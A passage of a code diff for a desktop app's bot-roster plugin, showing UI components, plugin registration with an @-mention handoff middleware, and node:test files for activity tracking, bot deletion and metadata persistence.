+                    'flex flex-1 items-center justify-center px-4 text-center text-xs text-(--ui-text-tertiary)',
+                  role: 'status',
+                  children: `No bots match “${query.trim()}”`
+                })
+              : jsx(ScrollArea, {
+                  className: 'hermes-bots-roster min-h-0 flex-1',
+                  children: jsx('div', {
+                    className: 'grid w-full min-w-0 gap-0.5 px-1.5 pb-2',
+                    children: groupRoster(filteredRoster, allMeta).flatMap(section => [
+                      section.group
+                        ? jsxs('div', {
+                            className: 'mt-2 flex items-center gap-2 px-1 pb-0.5 first:mt-0.5',
+                            children: [
+                              jsx('span', {
+                                className:
+                                  'shrink-0 text-[0.625rem] font-semibold uppercase tracking-wider text-(--ui-text-quaternary)',
+                                children: section.group
+                              }),
+                              jsx('div', { className: 'h-px min-w-0 flex-1 bg-(--ui-stroke-secondary)' }),
+                              groupNeedsYou[section.group]
+                                ? jsx('span', {
+                                    className:
+                                      'shrink-0 rounded-full bg-(--ui-accent,#4f9cf9) px-1.5 text-[0.6rem] font-semibold text-white',
+                                    title: 'A bot in this room needs your input',
+                                    children: 'needs you'
+                                  })
+                                : null,
+                              section.bots.length > 1 && section.bots.length <= GROUP_CHAT_MAX_MEMBERS
+                                ? jsx('button', {
+                                    type: 'button',
+                                    className:
+                                      'shrink-0 rounded px-1 text-[0.625rem] font-medium text-(--ui-text-tertiary) transition-colors hover:bg-(--chrome-action-hover) hover:text-foreground',
+                                    title: `Open the ${section.group} group chat`,
+                                    onClick: () => {
+                                      $groupNeedsYou.set({ ...$groupNeedsYou.get(), [section.group]: false })
+                                      $groupChatWorkspace.set(section.group)
+                                    },
+                                    children: 'Open chat'
+                                  })
+                                : null
+                            ]
+                          }, `group:${section.group}`)
+                        : null,
+                      ...section.bots.map(bot =>
+                        jsx(BotRow, { bot, onDelete: setDeleting, onEdit: setEditing, onGroup: setGrouping }, bot.name)
+                      )
+                    ])
+                  })
+                }),
+      jsx('div', {
+        className: 'border-t border-(--ui-stroke-secondary) p-2',
+        children: jsxs(Button, {
+          className: 'w-full justify-center gap-1.5',
+          variant: 'secondary',
+          onClick: () => setCreateOpen(true),
+          children: [jsx(Codicon, { name: 'add' }), 'New Agent']
+        })
+      }),
+      jsx(CreateAgentDialog, {
+        open: createOpen,
+        onClose: () => {
+          setCreateOpen(false)
+          void refetch()
+        },
+        roster
+      }),
+      jsx(EditProfileDialog, {
+        bot: editing,
+        open: Boolean(editing),
+        onClose: () => {
+          setEditing(null)
+          void refetch()
+        }
+      }),
+      grouping ? jsx(GroupDialog, { bot: grouping, onClose: () => setGrouping(null) }) : null,
+      jsx(ConfirmDialog, {
+        open: Boolean(deleting),
+        title: 'Delete bot and profile?',
+        description: deleting
+          ? jsxs('span', {
+              children: [
+                'This will permanently delete the bot ',
+                jsx('span', { className: 'font-medium text-foreground', children: deleting.name }),
+                ' and its associated Hermes profile at ',
+                jsx('span', { className: 'font-mono text-xs', children: deleting.path }),
+                '. This cannot be undone.'
+              ]
+            })
+          : null,
+        destructive: true,
+        confirmLabel: 'Delete',
+        busyLabel: 'Deleting…',
+        doneLabel: 'Deleted',
+        onClose: () => setDeleting(null),
+        onConfirm: async () => {
+          if (!deleting) {
+            return
+          }
+
+          const name = deleting.name
+          await deleteBot(deleting)
+          await refetch()
+          host.notify({ kind: 'success', message: `Deleted profile ${name}` })
+        }
+      })
+    ]
+  })
+}
+
+// ── plugin ───────────────────────────────────────────────────────────────────
+
+export default {
+  id: ID,
+  name: 'Bots',
+  description: 'Bot Mode — a one-chat-per-agent roster with avatars, routines, group chats, and bot-to-bot messaging. Ships with the app; disable here if unwanted.',
+  register(ctx) {
+    pluginCtx = ctx
+    startFaceClock()
+
+    // Keyframes for the pet bob — injected because plugin classes aren't in
+    // the app's precompiled CSS. Idempotent across hot reloads.
+    if (!document.getElementById('hermes-bots-keyframes')) {
+      const style = document.createElement('style')
+      style.id = 'hermes-bots-keyframes'
+      style.textContent = '@keyframes hermes-bots-bob { from { transform: translateY(0); } to { transform: translateY(-3px); } }'
+      document.head.appendChild(style)
+    }
+
+    // Hydrate persisted avatars/titles. Storage may be sync, async, or
+    // absent depending on shell version — normalize through Promise.resolve
+    // inside a try so a storage quirk can NEVER fail the plugin load.
+    try {
+      Promise.resolve(ctx.storage?.get?.('bot-meta'))
+        .then(value => {
+          if (value && typeof value === 'object' && !Array.isArray(value)) {
+            const live = $botMeta.get()
+            const next = { ...value }
+            for (const name of Object.keys(live)) {
+              next[name] = { ...(value[name] || {}), ...live[name] }
+            }
+            $botMeta.set(next)
+          }
+        })
+        .catch(() => undefined)
+    } catch {
+      /* no storage on this shell — defaults stay */
+    }
+
+    // Hydrate the "hide Bot Chats from the sidebar" pref (default ON).
+    try {
+      Promise.resolve(ctx.storage?.get?.('hide-bot-chats'))
+        .then(value => {
+          if (typeof value === 'boolean') {
+            $hideBotChats.set(value)
+          }
+        })
+        .catch(() => undefined)
+    } catch {
+      /* no storage — default (hide) stays */
+    }
+
+    // Hydrate the activity-toast pref (default OFF).
+    try {
+      Promise.resolve(ctx.storage?.get?.('activity-toasts'))
+        .then(value => {
+          if (typeof value === 'boolean') {
+            $activityToasts.set(value)
+          }
+        })
+        .catch(() => undefined)
+    } catch {
+      /* no storage — default (silent) stays */
+    }
+
+    // Hydrate persisted group-chat room logs (epoch/running are runtime-only
+    // and always reset — a loop can't survive a window reload anyway).
+    try {
+      Promise.resolve(ctx.storage?.get?.('group-chats'))
+        .then(value => {
+          if (value && typeof value === 'object' && !Array.isArray(value)) {
+            const rooms = {}
+
+            for (const [name, room] of Object.entries(value)) {
+              if (room && Array.isArray(room.log)) {
+                rooms[name] = {
+                  log: room.log,
+                  watermarks: room.watermarks && typeof room.watermarks === 'object' ? room.watermarks : {},
+                  sessions: room.sessions && typeof room.sessions === 'object' ? room.sessions : {},
+                  epoch: 0,
+                  running: false
+                }
+              }
+            }
+
+            $groupChats.set({ ...rooms, ...$groupChats.get() })
+          }
+        })
+        .catch(() => undefined)
+    } catch {
+      /* no storage — rooms start empty */
+    }
+
+    // Routines follow the chat you're in: track the live gateway profile.
+    host.state.profile.listen(profile => {
+      if (profile && typeof profile === 'string') {
+        $selectedBot.set(profile)
+      }
+    })
+    host.state.gateway.listen(handleSessionsGatewayTransition)
+
+    ctx.register({
+      id: 'pane',
+      area: 'panes',
+      title: 'Bots',
+      // dock: explicit adoption gesture. Without it the tree adopts a
+      // same-placement pane by CENTER-STACKING it into the sessions zone —
+      // and when that zone's header is hidden (lone-pane auto-hide is the
+      // default the user never changed), the sessions pane vanishes behind
+      // the Bots tab with no visible strip to switch back. Splitting below
+      // the sessions pane keeps both surfaces visible instead.
+      data: { placement: 'left', width: '260px', dock: { pane: 'sessions', pos: 'bottom' } },
+      render: () => jsx(BotsPane, {})
+    })
+
+    // Routines — its OWN tiling pane splitting the workspace's right edge
+    // (NOT the collapsible right sidebar; placement 'right' is that sidebar's
+    // role and hides the pane until "Show Right Sidebar").
+    ctx.register({
+      id: 'routines',
+      area: 'panes',
+      title: 'Cronjobs',
+      data: {
+        placement: 'main',
+        dock: { pane: 'workspace', pos: 'right' },
+        width: '250px'
+      },
+      render: () => jsx(RoutinesPane, {})
+    })
+
+    ctx.register({
+      id: 'new-agent',
+      area: PALETTE_AREA,
+      data: {
+        id: `${ID}.new-agent`,
+        label: 'New Agent…',
+        keywords: ['bot', 'agent', 'profile', 'teammate', 'create'],
+        run: () => {
+          host.notify({ kind: 'info', message: 'Open the Bots pane and hit “New Agent”.' })
+        }
+      }
+    })
+
+    // @-mention middleware: "@<bot> do the thing" in any chat becomes an
+    // explicit handoff instruction the active agent's SOUL.md knows how to
+    // execute. Names are validated against the LIVE roster so
+    // "user@example.com" or an unknown @ passes through untouched.
+    ctx.register({
+      id: 'mention-middleware',
+      area: COMPOSER_AREAS.middleware,
+      data: {
+        handler: async draft => {
+          const text = draft.text || ''
+
+          // /new inside a bot's canonical forever-chat would fork the
+          // relationship into a scratch session — the one thing Bots mode
+          // promises never happens. Reroute to /compact (same felt effect:
+          // fresh working context, SAME conversation) and say so. Only
+          // guards the canonical chat: Sessions-mode scratchpads on the
+          // same profile keep full /new freedom.
+          const slashNew = /^\/(new|reset)\s*$/.exec(text.trim())
+
+          if (slashNew) {
+            const activeBot = $selectedBot.get()
+            const meta = activeBot ? $botMeta.get()[activeBot] : null
+            const pinnedId = meta?.chat || null
+            const currentId = host.activeSessionId?.get?.() ?? null
+
+            if (activeBot && pinnedId && currentId && String(currentId) === String(pinnedId)) {
+              host.notify({
+                kind: 'info',
+                title: 'This chat never resets',
+                message:
+                  'Bot chats are one continuous conversation — compacting instead. ' +
+                  'For a throwaway session with this agent, use Sessions mode.'
+              })
+
+              return { ...draft, text: '/compact' }
+            }
+          }
+
+          if (!/(^|\s)@[a-z0-9][a-z0-9_-]*/i.test(text)) {
+            return draft
+          }
+
+          let names = []
+          try {
+            const res = await host.request('profiles.list', { include_sessions: false })
+            names = (res?.profiles ?? []).map(p => p.name)
+          } catch {
+            return draft
+          }
+
+          // Mentions in code are code, not handoffs (#20).
+          const prose = text.replace(/```[\s\S]*?```/g, ' ').replace(/`[^`\n]*`/g, ' ')
+          const active = (host.state.profile.get() || 'default').trim() || 'default'
+          const mentioned = []
+
+          for (const match of prose.matchAll(/(^|\s)@([a-z0-9][a-z0-9_-]*)/gi)) {
+            let name = match[2].toLowerCase()
+
+            if (name === 'hermes' && !names.includes('hermes') && names.includes('default')) {
+              name = 'default'
+            }
+
+            if (names.includes(name) && name !== active && !mentioned.includes(name)) {
+              mentioned.push(name)
+            }
+          }
+
+          if (!mentioned.length) {
+            return draft
+          }
+
+          // The ACTIVE BOT composes the message — it understands intent; a
+          // text pipe never can. Delivery is the one blessed command into the
+          // recipient's canonical Bot Chat, so their side reads as a normal
+          // DM (message bubble + their reply), and the reply prints on
+          // stdout for the sender to relay.
+          const activeMeta = $botMeta.get()[active]
+          const senderName = displayName({ name: active, title: activeMeta?.title }, activeMeta)
+          // The command below runs verbatim in the active agent's terminal:
+          // sender titles are free text (and sync from ui_meta), and profile
+          // names come from the gateway — every interpolated value must stay
+          // shell-literal, same class as the routine-prompt fix (#21).
+          const note =
+            '\n\n[@mention handoff — for each mentioned agent (' + mentioned.map(botHandle).join(', ') + '): ' +
+            'COMPOSE a message from you (' + senderName + ') to that agent conveying what the user wants — do not forward this text verbatim (avoid double quotes in your composed message). Send it with exactly one terminal call, run with background=true AND notify_on_complete=true (the recipient may take minutes; the user must not be blocked):\n' +
+            mentioned.map(n => '`hermes -p ' + shellQuote(n) + ' chat --in ~ -c "Bot Chat" -Q -q "Message from \uD83E\uDD16 ' + shellDoubleQuote(senderName) + ' (@' + shellDoubleQuote(botHandle(active)) + '): <your composed message>"`').join('\n') +
+            '\nAfter dispatching, tell the user the message was sent and END YOUR TURN — do not wait or poll; when the background process completes, its notification carries the reply — relay it then, attributed to that agent. If it fails with "No session found matching \'Bot Chat\'", send once without the -c flag, then run `hermes -p <agent> sessions rename <session_id from the output> "Bot Chat"`. ' +
+            'Relay the reply back to the user, attributed to that agent.]'
+
+          return { ...draft, text: text + note }
+        }      }
+    })
+  }
+}

--- a/apps/desktop/src/plugins/hermes-bots/tests/active-now-strip.test.mjs
+++ b/apps/desktop/src/plugins/hermes-bots/tests/active-now-strip.test.mjs
@@ -1,0 +1,96 @@
+import assert from 'node:assert/strict'
+import { readFileSync } from 'node:fs'
+import test from 'node:test'
+import vm from 'node:vm'
+
+const source = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8')
+
+// The activeBots helper must stay a self-contained slice between the
+// liveness-window constant and the BotRow section so tests can extract it.
+function loadActiveBots() {
+  const start = source.indexOf('const ACTIVE_WINDOW_S')
+  const end = source.indexOf('// ── bot row ─')
+
+  assert.ok(start >= 0 && end > start, 'activeBots block must remain extractable')
+
+  const context = {}
+  vm.runInNewContext(
+    `${source.slice(start, end)}\nglobalThis.__activeBots = activeBots;`,
+    context
+  )
+
+  return context.__activeBots
+}
+
+// Fixed clock so "inside the window" vs "stale" is deterministic.
+const NOW = 1_000_000_000_000
+
+const roster = [
+  { name: 'researcher', last_session: { last_active: (NOW / 1000) - 10 } },
+  { name: 'scribe', last_session: { last_active: (NOW / 1000) - 400 } },
+  { name: 'analyst', last_session: null }
+]
+
+test('activeBots includes the gateway-busy selected profile before its first response lands', () => {
+  const activeBots = loadActiveBots()
+  // analyst has no last_session at all — a busy turn must still show it.
+  const names = activeBots(roster, 'analyst', 'busy', NOW).map(bot => bot.name)
+  assert.ok(names.includes('analyst'))
+})
+
+test('activeBots includes bots whose last message is inside the liveness window', () => {
+  const activeBots = loadActiveBots()
+  const names = activeBots(roster, 'default', 'open', NOW).map(bot => bot.name)
+  assert.ok(names.includes('researcher'))
+})
+
+test('activeBots excludes stale activity outside the window', () => {
+  const activeBots = loadActiveBots()
+  const names = activeBots(roster, 'default', 'open', NOW).map(bot => bot.name)
+  assert.ok(!names.includes('scribe'))
+})
+
+test('activeBots preserves roster order and never hides other bots', () => {
+  const activeBots = loadActiveBots()
+  // Mixed window: only researcher qualifies, but the output stays in input
+  // order and the full roster object is untouched.
+  const active = activeBots(roster, 'default', 'open', NOW)
+  assert.deepEqual(active.map(bot => bot.name), ['researcher'])
+  assert.equal(roster.length, 3)
+})
+
+test('activeBots returns an empty list when nothing is active', () => {
+  const activeBots = loadActiveBots()
+  const quiet = [
+    { name: 'scribe', last_session: { last_active: (NOW / 1000) - 400 } },
+    { name: 'analyst', last_session: null }
+  ]
+  assert.deepEqual(activeBots(quiet, 'default', 'open', NOW), [])
+})
+
+test('roster without profiles never throws', () => {
+  const activeBots = loadActiveBots()
+  assert.equal(activeBots(null, 'default', 'open', NOW).length, 0)
+  assert.equal(activeBots([], 'default', 'open', NOW).length, 0)
+})
+
+test('ActiveNowStrip renders above the roster, is a live region, and is click-accessible', () => {
+  // Strip is placed between the pane header and the search field.
+  const headerEnd = source.indexOf("children: 'Bots'")
+  const searchField = source.indexOf("placeholder: 'Search bots…'")
+  assert.ok(headerEnd >= 0 && searchField > headerEnd)
+
+  const stripStart = source.indexOf('jsx(ActiveNowStrip')
+  assert.ok(stripStart > headerEnd && stripStart < searchField, 'strip sits between header and search')
+
+  // Live region announces membership changes politely.
+  assert.match(source, /'aria-live': 'polite'/)
+  // Chips are real buttons (keyboard/click accessible), reuse BotFace, and
+  // open the canonical chat via the same path as roster rows.
+  assert.match(source, /jsx\('button', \{\s*type: 'button',\s*title: `Open \$\{label\}'s chat`/)
+  // The key rides as jsx()'s third argument — the ONLY form React treats as
+  // a list key; a `key:` prop leaves chips unkeyed (index identity).
+  assert.match(source, /\}, bot\.name\)\s*\}\)\s*\]\s*\}\)\s*\}\s*\/\*\* Assign a bot to a group/s)
+  assert.match(source, /jsx\(BotFace,\s*\{[\s\S]*?mood: 'work'/)
+  assert.match(source, /openBotCanonicalChat\(bot\.name, allMeta\[bot\.name\]\?\.chat\)/)
+})

--- a/apps/desktop/src/plugins/hermes-bots/tests/activity-toasts.test.mjs
+++ b/apps/desktop/src/plugins/hermes-bots/tests/activity-toasts.test.mjs
@@ -1,0 +1,70 @@
+import assert from 'node:assert/strict'
+import { readFileSync } from 'node:fs'
+import test from 'node:test'
+import vm from 'node:vm'
+
+// Activity toasts are OPT-IN: by default new bot activity only sets the
+// unread badge — host.notify fires only when the 'activity-toasts' pref is
+// enabled. A busy roster (cron runs, bot-to-bot chatter) must not firehose
+// the user with notifications out of the box.
+
+const source = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8')
+
+function loadTracker(toastsEnabled) {
+  const start = source.indexOf('const rosterWatermarks = new Map()')
+  const end = source.indexOf('/** Last good cron list', start)
+  const notifications = []
+  const context = {
+    pluginCtx: null,
+    atom: initial => {
+      let value = initial
+      return { get: () => value, set: next => { value = next } }
+    },
+    host: { notify: params => notifications.push(params) },
+    $selectedBot: { get: () => 'default' },
+    $botMeta: { get: () => ({}) },
+    $botUnread: (() => {
+      let value = {}
+      return { get: () => value, set: next => { value = next } }
+    })(),
+    displayName: bot => bot.name
+  }
+  const section = source
+    .slice(start, end)
+    .concat('\nglobalThis.__t = { trackInboundActivity, $activityToasts, setActivityToasts };\n')
+  vm.runInNewContext(section, context, { filename: 't.js' })
+  if (toastsEnabled) {
+    context.__t.$activityToasts.set(true)
+  }
+  return { ...context.__t, notifications, $botUnread: context.$botUnread }
+}
+
+function rosterAt(ts) {
+  return [{ name: 'researcher', last_session: { last_active: ts, preview: 'Message from writer: hi' } }]
+}
+
+test('default: new activity sets unread badge but never toasts', () => {
+  const t = loadTracker(false)
+  t.trackInboundActivity(rosterAt(100)) // seeding poll
+  t.trackInboundActivity(rosterAt(200)) // activity moved past watermark
+  assert.equal(t.$botUnread.get().researcher, true, 'unread badge must still be set')
+  assert.equal(t.notifications.length, 0, 'no toast by default')
+})
+
+test('opt-in: enabling the pref restores per-activity toasts', () => {
+  const t = loadTracker(true)
+  t.trackInboundActivity(rosterAt(100))
+  t.trackInboundActivity(rosterAt(200))
+  assert.equal(t.notifications.length, 1)
+  assert.match(t.notifications[0].title, /New message for researcher/)
+})
+
+test('pref defaults OFF and persists via ctx.storage under activity-toasts', () => {
+  const t = loadTracker(false)
+  assert.equal(t.$activityToasts.get(), false, 'default must be off')
+  assert.match(
+    source.slice(source.indexOf('function setActivityToasts('), source.indexOf('/** Detect new inbound activity')),
+    /storage\?\.set\?\.\('activity-toasts', enabled\)/
+  )
+  assert.match(source, /storage\?\.get\?\.\('activity-toasts'\)/)
+})

--- a/apps/desktop/src/plugins/hermes-bots/tests/bot-delete.test.mjs
+++ b/apps/desktop/src/plugins/hermes-bots/tests/bot-delete.test.mjs
@@ -1,0 +1,104 @@
+import assert from 'node:assert/strict'
+import { readFileSync } from 'node:fs'
+import test from 'node:test'
+import vm from 'node:vm'
+
+const pluginSource = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8')
+
+function load({ sdkDeleteProfile = false } = {}) {
+  const requests = []
+  const sdkDeletes = []
+  const invalidations = []
+  const stored = []
+  const values = new Map()
+  const atom = initial => {
+    const slot = { get: () => values.get(slot), set: value => values.set(slot, value) }
+    values.set(slot, initial)
+    return slot
+  }
+  const context = {
+    atom,
+    PALETTE_AREA: 'palette',
+    COMPOSER_AREAS: { middleware: 'middleware' },
+    document: { getElementById: () => null, createElement: () => ({}), head: { appendChild: () => undefined } },
+    host: {
+      state: {
+        profile: { listen: () => undefined },
+        gateway: { listen: () => undefined }
+      },
+      ...(sdkDeleteProfile
+        ? {
+            deleteProfile: async name => {
+              sdkDeletes.push(name)
+            }
+          }
+        : {}),
+      request: async (method, params) => {
+        requests.push({ method, params })
+        return method === 'cli.exec' ? { blocked: false, code: 0, output: 'deleted' } : { ok: true }
+      }
+    },
+    queryClient: { invalidateQueries: value => invalidations.push(value) }
+  }
+  const source = pluginSource
+    .replace(/^import\s+\*\s+as\s+sdk\s+from '@hermes\/plugin-sdk'\r?\n/m, '')
+    .replace(/^import\s+\{[\s\S]*?\}\s+from '@hermes\/plugin-sdk'\r?\n/m, '')
+    .replace(/^const \{ McpTab, ToolsetConfigPanel \} = sdk\r?\n/m, '')
+    .replace(/^import .* from 'react'\r?\n/m, '')
+    .replace(/^import .* from 'react\/jsx-runtime'\r?\n/m, '')
+    .replace('export default {', 'globalThis.plugin = {')
+    .concat('\nglobalThis.__delete = { deleteBot, $botMeta, $botUnread, $selectedBot };\n')
+  vm.runInNewContext(source, context, { filename: 'plugin.js' })
+  context.plugin.register({
+    storage: {
+      get: () => null,
+      set: (key, value) => stored.push({ key, value })
+    },
+    register: () => undefined
+  })
+  return { context, requests, sdkDeletes, invalidations, stored }
+}
+
+test('unit: deleting a bot prefers the SDK deleteProfile (teardown-routed REST path)', async () => {
+  const { context, requests, sdkDeletes } = load({ sdkDeleteProfile: true })
+
+  await context.__delete.deleteBot({ name: 'researcher' })
+
+  assert.deepEqual(sdkDeletes, ['researcher'])
+  assert.equal(requests.filter(r => r.method === 'cli.exec').length, 0)
+})
+
+test('unit: older desktop without host.deleteProfile falls back to the non-interactive profile CLI command', async () => {
+  const { context, requests } = load()
+
+  await context.__delete.deleteBot({ name: 'researcher' })
+
+  assert.deepEqual(JSON.parse(JSON.stringify(requests[0])), {
+    method: 'cli.exec',
+    params: { argv: ['profile', 'delete', 'researcher', '--yes'] }
+  })
+})
+
+test('integration: a deleted bot is removed from plugin-local state and the roster is refreshed', async () => {
+  const { context, invalidations, stored } = load()
+  context.__delete.$botMeta.set({ researcher: { title: 'Research' }, writer: { title: 'Writer' } })
+  context.__delete.$botUnread.set({ researcher: true, writer: true })
+  context.__delete.$selectedBot.set('researcher')
+
+  await context.__delete.deleteBot({ name: 'researcher' })
+
+  assert.equal(context.__delete.$botMeta.get().researcher, undefined)
+  assert.equal(context.__delete.$botUnread.get().researcher, undefined)
+  assert.equal(context.__delete.$selectedBot.get(), 'default')
+  assert.equal(stored.at(-1).key, 'bot-meta')
+  assert.equal(stored.at(-1).value.researcher, undefined)
+  assert.equal(invalidations.length, 1)
+})
+
+test('regression: the bot context menu exposes a destructive delete action and confirmation', () => {
+  assert.match(pluginSource, /ContextMenuItem, \{[\s\S]*?variant: 'destructive'[\s\S]*?children: 'Delete'/)
+  assert.match(pluginSource, /bot\.is_default \? null : jsx\(ContextMenuSeparator/)
+  assert.match(pluginSource, /ConfirmDialog/)
+  assert.match(pluginSource, /title: 'Delete bot and profile\?'/)
+  assert.match(pluginSource, /This will permanently delete the bot[\s\S]*?and its associated Hermes profile at[\s\S]*?This cannot be undone\./)
+})

--- a/apps/desktop/src/plugins/hermes-bots/tests/bot-meta-asset-sync.test.mjs
+++ b/apps/desktop/src/plugins/hermes-bots/tests/bot-meta-asset-sync.test.mjs
@@ -1,0 +1,91 @@
+import assert from 'node:assert/strict'
+import { readFileSync } from 'node:fs'
+import test from 'node:test'
+import vm from 'node:vm'
+
+// Edit Profile always sends the avatar image in its saveBotMeta patch
+// (changed or not), and saveBotMeta fired profiles.set_asset for every patch
+// carrying the key. Each save re-uploaded the full data URL or fired a
+// `clear` — and a no-op `clear` from one machine could race another
+// machine's just-pushed avatar and wipe it server-side. set_asset now fires
+// only when the image actually changed; ui_meta sync is untouched.
+
+const pluginSource = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8')
+
+function load() {
+  const values = new Map()
+  const atom = initial => {
+    const slot = { get: () => values.get(slot), set: value => values.set(slot, value) }
+    values.set(slot, initial)
+    return slot
+  }
+  const requests = []
+  const context = {
+    atom,
+    PALETTE_AREA: 'palette',
+    COMPOSER_AREAS: { middleware: 'middleware' },
+    document: { getElementById: () => null, createElement: () => ({}), head: { appendChild: () => undefined } },
+    host: {
+      request: (method, params) => {
+        requests.push([method, params])
+        return Promise.resolve({})
+      },
+      state: { profile: { get: () => 'default', listen: () => undefined }, gateway: { listen: () => undefined } }
+    }
+  }
+  const source = pluginSource
+    .replace(/^import\s+\*\s+as\s+sdk\s+from '@hermes\/plugin-sdk'\r?\n/m, '')
+    .replace(/^import\s+\{[\s\S]*?\}\s+from '@hermes\/plugin-sdk'\r?\n/m, '')
+    .replace(/^const \{ McpTab, ToolsetConfigPanel \} = sdk\r?\n/m, '')
+    .replace(/^import .* from 'react'\r?\n/m, '')
+    .replace(/^import .* from 'react\/jsx-runtime'\r?\n/m, '')
+    .replace('export default {', 'globalThis.plugin = {')
+    .concat('\nglobalThis.__meta = { saveBotMeta, $botMeta };\n')
+  vm.runInNewContext(source, context, { filename: 'plugin.js' })
+  context.plugin.register({
+    storage: { get: () => null, set: () => undefined },
+    register: () => undefined
+  })
+  return { ...context.__meta, requests }
+}
+
+test('regression: set_asset fires only when the avatar image changes', async () => {
+  const { saveBotMeta, $botMeta, requests } = load()
+  const png = 'data:image/png;base64,AAAA'
+
+  saveBotMeta('ops', { image: png, title: 'One' })
+  saveBotMeta('ops', { image: png, title: 'Two' }) // re-save, same image
+  saveBotMeta('ops', { image: null, title: 'Three' }) // removed
+  saveBotMeta('ops', { title: 'Four' }) // no image key at all
+  await Promise.resolve()
+
+  const assetCalls = JSON.parse(
+    JSON.stringify(requests.filter(([method]) => method === 'profiles.set_asset').map(([, params]) => params))
+  )
+  assert.deepEqual(assetCalls, [
+    { name: 'ops', asset: 'avatar', data: png },
+    { name: 'ops', asset: 'avatar', clear: true }
+  ])
+
+  // Meta still merges per patch, and ui_meta sync is unaffected by the
+  // image-gating.
+  assert.equal($botMeta.get().ops.title, 'Four')
+  assert.equal(requests.filter(([method]) => method === 'profiles.configure').length, 4)
+})
+
+test('regression: duplicating a bot still pushes the copied avatar once', async () => {
+  const { saveBotMeta, requests } = load()
+  const png = 'data:image/png;base64,BBBB'
+
+  saveBotMeta('source', { image: png, title: 'Original' })
+  saveBotMeta('source-2', { image: png, title: 'Original (copy)' })
+  await Promise.resolve()
+
+  const assetCalls = JSON.parse(
+    JSON.stringify(requests.filter(([method]) => method === 'profiles.set_asset').map(([, params]) => params))
+  )
+  assert.deepEqual(assetCalls, [
+    { name: 'source', asset: 'avatar', data: png },
+    { name: 'source-2', asset: 'avatar', data: png } // fresh profile: image differs from its (empty) meta
+  ])
+})

--- a/apps/desktop/src/plugins/hermes-bots/tests/bot-meta-hydrate.test.mjs
+++ b/apps/desktop/src/plugins/hermes-bots/tests/bot-meta-hydrate.test.mjs
@@ -1,0 +1,92 @@
+import assert from 'node:assert/strict'
+import { readFileSync } from 'node:fs'
+import test from 'node:test'
+import vm from 'node:vm'
+
+const pluginSource = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8')
+
+function load(storageGet) {
+  const values = new Map()
+  const atom = initial => {
+    const slot = { get: () => values.get(slot), set: value => values.set(slot, value) }
+    values.set(slot, initial)
+    return slot
+  }
+  const context = {
+    atom,
+    PALETTE_AREA: 'palette',
+    COMPOSER_AREAS: { middleware: 'middleware' },
+    document: { getElementById: () => null, createElement: () => ({}), head: { appendChild: () => undefined } },
+    host: {
+      request: async () => ({}),
+      state: {
+        profile: { listen: () => undefined },
+        gateway: { listen: () => undefined }
+      }
+    }
+  }
+  const source = pluginSource
+    .replace(/^import\s+\*\s+as\s+sdk\s+from '@hermes\/plugin-sdk'\r?\n/m, '')
+    .replace(/^import\s+\{[\s\S]*?\}\s+from '@hermes\/plugin-sdk'\r?\n/m, '')
+    .replace(/^const \{ McpTab, ToolsetConfigPanel \} = sdk\r?\n/m, '')
+    .replace(/^import .* from 'react'\r?\n/m, '')
+    .replace(/^import .* from 'react\/jsx-runtime'\r?\n/m, '')
+    .replace('export default {', 'globalThis.plugin = {')
+    .concat('\nglobalThis.__api = { saveBotMeta, $botMeta, plugin };\n')
+  vm.runInNewContext(source, context, { filename: 'plugin.js' })
+  context.plugin.register({
+    storage: { get: storageGet, set: () => undefined },
+    register: () => undefined
+  })
+  return context.__api
+}
+
+test('regression: a slow load does not wipe a pin written this session', async () => {
+  let resolveStorage
+  const pending = new Promise(resolve => {
+    resolveStorage = resolve
+  })
+  const runtime = load(() => pending)
+
+  runtime.saveBotMeta('researcher', { chat: 'sess-just-created', title: 'Research' })
+  assert.equal(runtime.$botMeta.get().researcher.chat, 'sess-just-created')
+
+  resolveStorage({ researcher: { title: 'Research' } })
+  await pending
+  await Promise.resolve()
+  await Promise.resolve()
+
+  assert.equal(runtime.$botMeta.get().researcher.chat, 'sess-just-created')
+  assert.equal(runtime.$botMeta.get().researcher.title, 'Research')
+})
+
+test('regression: a slow load still keeps looks from disk under a new pin', async () => {
+  let resolveStorage
+  const pending = new Promise(resolve => {
+    resolveStorage = resolve
+  })
+  const runtime = load(() => pending)
+
+  runtime.saveBotMeta('researcher', { chat: 'sess-just-created' })
+  resolveStorage({ researcher: { title: 'Research', shape: 'cloud', color: '#38bdf8' } })
+  await pending
+  await Promise.resolve()
+  await Promise.resolve()
+
+  assert.equal(runtime.$botMeta.get().researcher.chat, 'sess-just-created')
+  assert.equal(runtime.$botMeta.get().researcher.shape, 'cloud')
+  assert.equal(runtime.$botMeta.get().researcher.title, 'Research')
+})
+
+test('unit: disk still fills in bots we have not touched yet', async () => {
+  const runtime = load(() => ({
+    researcher: { title: 'Research', chat: 'sess-old' },
+    writer: { title: 'Writer' }
+  }))
+
+  await Promise.resolve()
+  await Promise.resolve()
+
+  assert.equal(runtime.$botMeta.get().researcher.chat, 'sess-old')
+  assert.equal(runtime.$botMeta.get().writer.title, 'Writer')
+})

--- a/apps/desktop/src/plugins/hermes-bots/tests/bot-meta-persistence.test.mjs
+++ b/apps/desktop/src/plugins/hermes-bots/tests/bot-meta-persistence.test.mjs
@@ -1,0 +1,99 @@
+import assert from 'node:assert/strict'
+import { readFileSync } from 'node:fs'
+import test from 'node:test'
+import vm from 'node:vm'
+
+const pluginSource = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8')
+
+function load(configureResponse) {
+  const values = new Map()
+  const atom = initial => {
+    const slot = { get: () => values.get(slot), set: value => values.set(slot, value) }
+    values.set(slot, initial)
+    return slot
+  }
+  const requests = []
+  const context = {
+    atom,
+    PALETTE_AREA: 'palette',
+    COMPOSER_AREAS: { middleware: 'middleware' },
+    document: { getElementById: () => null, createElement: () => ({}), head: { appendChild: () => undefined } },
+    host: {
+      request: (method, params) => {
+        requests.push([method, params])
+        if (method === 'profiles.configure') {
+          return typeof configureResponse === 'function' ? configureResponse() : Promise.resolve(configureResponse)
+        }
+        return Promise.resolve({})
+      },
+      state: { profile: { get: () => 'default', listen: () => undefined }, gateway: { listen: () => undefined } }
+    }
+  }
+  const source = pluginSource
+    .replace(/^import\s+\*\s+as\s+sdk\s+from '@hermes\/plugin-sdk'\r?\n/m, '')
+    .replace(/^import\s+\{[\s\S]*?\}\s+from '@hermes\/plugin-sdk'\r?\n/m, '')
